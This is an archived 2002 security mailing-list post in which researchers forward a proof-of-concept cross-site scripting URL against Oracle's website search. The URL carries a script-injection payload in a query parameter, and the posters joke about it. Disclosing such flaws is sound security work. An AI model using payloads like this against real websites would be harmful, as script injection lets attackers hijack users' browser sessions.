Vulnerability Development mailing list archives
Re: Oracle Databases Allow HTML/SQL injection
From: KF <dotslash () snosoft com>
Date: Tue, 16 Apr 2002 11:58:17 -0700
Looks like we stumbled on the same thing... Snosoft was gonna send this out with our April Fools stuff...
--- Begin Forwarded message ----
On Mon, 1 Apr 2002, l0rt wrote:

dots cross site scripting of oracle baby... ;o) ain't he sexy.
-l0rt-

> HEH
>
> http://www.oracle.com/pls/use/use_query_html_v3.submit_query_input?p_adv_query_text=%3Cscript%3Ealert(%27hi%27)%3C/script%3E&p_origin=www&p_person_id=100582&p_community=oracle.com_v2&p_doc_location_array=Place+Holder&p_doc_location_array=document&p_location_array=&p_keyword_array=100017&p_value_array=www.oracle.com&p_date_begin=q_date&p_date_end=q_date&p_max_return=200
>
> -KF